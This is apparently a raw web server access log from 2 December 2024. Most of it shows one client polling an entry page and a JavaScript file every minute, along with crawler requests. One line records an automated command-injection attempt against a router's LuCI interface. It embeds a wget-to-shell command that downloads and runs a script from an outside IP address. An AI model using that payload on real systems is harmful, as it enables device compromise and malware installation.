178.115.42.220 - - [02/Dec/2024:15:18:46 +0100] "GET /gui/javascript/form_form.js?1733149126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:19:47 +0100] "GET /entry.php?id=10271&&ser=149126 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:19:47 +0100] "GET /gui/javascript/form_form.js?1733149187 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:20:47 +0100] "GET /entry.php?id=10271&&ser=149187 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:20:47 +0100] "GET /gui/javascript/form_form.js?1733149247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:21:47 +0100] "GET /entry.php?id=10271&&ser=149247 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=149187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:21:47 +0100] "GET /gui/javascript/form_form.js?1733149307 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:15:22:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002131203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:22:48 +0100] "GET /entry.php?id=10271&&ser=149307 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=149247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:22:48 +0100] "GET /gui/javascript/form_form.js?1733149368 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149307" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:23:48 +0100] "GET /entry.php?id=10271&&ser=149368 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=149307" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:23:48 +0100] "GET /gui/javascript/form_form.js?1733149428 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
223.71.167.171 - - [02/Dec/2024:15:24:46 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
178.115.42.220 - - [02/Dec/2024:15:24:48 +0100] "GET /entry.php?id=10271&&ser=149428 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:24:48 +0100] "GET /gui/javascript/form_form.js?1733149488 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:25:48 +0100] "GET /entry.php?id=10271&&ser=149488 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:25:49 +0100] "GET /gui/javascript/form_form.js?1733149549 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149488" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:15:26:21 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-1232017-fr.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:26:49 +0100] "GET /entry.php?id=10271&&ser=149549 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149488" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:26:49 +0100] "GET /gui/javascript/form_form.js?1733149609 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:27:49 +0100] "GET /entry.php?id=10271&&ser=149609 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:27:49 +0100] "GET /gui/javascript/form_form.js?1733149669 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:28:49 +0100] "GET /entry.php?id=10271&&ser=149669 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:28:49 +0100] "GET /gui/javascript/form_form.js?1733149729 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:29:50 +0100] "GET /entry.php?id=10271&&ser=149729 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:29:50 +0100] "GET /gui/javascript/form_form.js?1733149790 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149729" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:30:50 +0100] "GET /entry.php?id=10271&&ser=149790 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=149729" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:30:50 +0100] "GET /gui/javascript/form_form.js?1733149850 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:31:50 +0100] "GET /entry.php?id=10271&&ser=149850 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:31:50 +0100] "GET /gui/javascript/form_form.js?1733149910 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:32:51 +0100] "GET /entry.php?id=10271&&ser=149910 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:32:51 +0100] "GET /gui/javascript/form_form.js?1733149971 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149910" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:33:51 +0100] "GET /entry.php?id=10271&&ser=149971 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=149910" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:33:51 +0100] "GET /gui/javascript/form_form.js?1733150031 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=149971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:34:51 +0100] "GET /entry.php?id=10271&&ser=150031 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=149971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:34:51 +0100] "GET /gui/javascript/form_form.js?1733150091 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150031" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:35:51 +0100] "GET /entry.php?id=10271&&ser=150091 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=150031" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:35:52 +0100] "GET /gui/javascript/form_form.js?1733150152 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:36:52 +0100] "GET /entry.php?id=10271&&ser=150151 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:36:52 +0100] "GET /gui/javascript/form_form.js?1733150212 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:37:52 +0100] "GET /entry.php?id=10271&&ser=150212 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=150151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:37:52 +0100] "GET /gui/javascript/form_form.js?1733150272 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:38:52 +0100] "GET /entry.php?id=10271&&ser=150272 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:38:52 +0100] "GET /gui/javascript/form_form.js?1733150332 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:39:53 +0100] "GET /entry.php?id=10271&&ser=150332 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=150272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:39:53 +0100] "GET /gui/javascript/form_form.js?1733150393 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:40:53 +0100] "GET /entry.php?id=10271&&ser=150393 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=150332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:40:53 +0100] "GET /gui/javascript/form_form.js?1733150453 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:41:53 +0100] "GET /entry.php?id=10271&&ser=150453 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=150393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:41:53 +0100] "GET /gui/javascript/form_form.js?1733150513 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:42:53 +0100] "GET /entry.php?id=10271&&ser=150513 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:42:54 +0100] "GET /gui/javascript/form_form.js?1733150574 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:43:54 +0100] "GET /entry.php?id=10271&&ser=150574 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=150513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:43:54 +0100] "GET /gui/javascript/form_form.js?1733150634 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:15:44:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910230903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:44:54 +0100] "GET /entry.php?id=10271&&ser=150634 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=150574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:44:54 +0100] "GET /gui/javascript/form_form.js?1733150694 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:45:54 +0100] "GET /entry.php?id=10271&&ser=150694 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:45:54 +0100] "GET /gui/javascript/form_form.js?1733150754 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:46:55 +0100] "GET /entry.php?id=10271&&ser=150754 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:46:55 +0100] "GET /gui/javascript/form_form.js?1733150815 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:47:55 +0100] "GET /entry.php?id=10271&&ser=150815 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:47:55 +0100] "GET /gui/javascript/form_form.js?1733150875 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150815" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
31.220.1.88 - - [02/Dec/2024:15:48:39 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.115.42.220 - - [02/Dec/2024:15:48:55 +0100] "GET /entry.php?id=10271&&ser=150875 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=150815" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:48:55 +0100] "GET /gui/javascript/form_form.js?1733150935 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150875" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:49:55 +0100] "GET /entry.php?id=10271&&ser=150935 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150875" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:49:56 +0100] "GET /gui/javascript/form_form.js?1733150996 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
47.128.47.47 - - [02/Dec/2024:15:50:49 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:50:56 +0100] "GET /entry.php?id=10271&&ser=150996 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:50:56 +0100] "GET /gui/javascript/form_form.js?1733151056 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=150996" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:51:56 +0100] "GET /entry.php?id=10271&&ser=151056 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=150996" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:51:56 +0100] "GET /gui/javascript/form_form.js?1733151116 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:52:56 +0100] "GET /entry.php?id=10271&&ser=151116 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:52:57 +0100] "GET /gui/javascript/form_form.js?1733151177 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
57.129.59.152 - - [02/Dec/2024:15:53:34 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 15.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.119 Chrome/124.0.6367.119 Not-A.Brand/99 Safari/537.36"
178.115.42.220 - - [02/Dec/2024:15:53:57 +0100] "GET /entry.php?id=10271&&ser=151177 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:53:57 +0100] "GET /gui/javascript/form_form.js?1733151237 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151177" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
47.128.124.255 - - [02/Dec/2024:15:54:49 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:54:57 +0100] "GET /entry.php?id=10271&&ser=151237 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151177" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:54:57 +0100] "GET /gui/javascript/form_form.js?1733151297 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151237" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:55:57 +0100] "GET /entry.php?id=10271&&ser=151297 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=151237" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:55:57 +0100] "GET /gui/javascript/form_form.js?1733151357 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:56:58 +0100] "GET /entry.php?id=10271&&ser=151357 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:56:58 +0100] "GET /gui/javascript/form_form.js?1733151418 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
194.50.16.198 - - [02/Dec/2024:15:57:11 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
178.115.42.220 - - [02/Dec/2024:15:57:58 +0100] "GET /entry.php?id=10271&&ser=151418 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:57:58 +0100] "GET /gui/javascript/form_form.js?1733151478 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
47.128.110.30 - - [02/Dec/2024:15:58:49 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:15:58:58 +0100] "GET /entry.php?id=10271&&ser=151478 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=151418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:58:58 +0100] "GET /gui/javascript/form_form.js?1733151538 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151478" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:59:58 +0100] "GET /entry.php?id=10271&&ser=151538 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151478" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:15:59:59 +0100] "GET /gui/javascript/form_form.js?1733151599 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:00:59 +0100] "GET /entry.php?id=10271&&ser=151599 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:00:59 +0100] "GET /gui/javascript/form_form.js?1733151659 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:01:59 +0100] "GET /entry.php?id=10271&&ser=151659 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:01:59 +0100] "GET /gui/javascript/form_form.js?1733151719 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151659" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
47.128.45.199 - - [02/Dec/2024:16:02:49 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:16:02:59 +0100] "GET /entry.php?id=10271&&ser=151719 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=151659" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:02:59 +0100] "GET /gui/javascript/form_form.js?1733151779 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
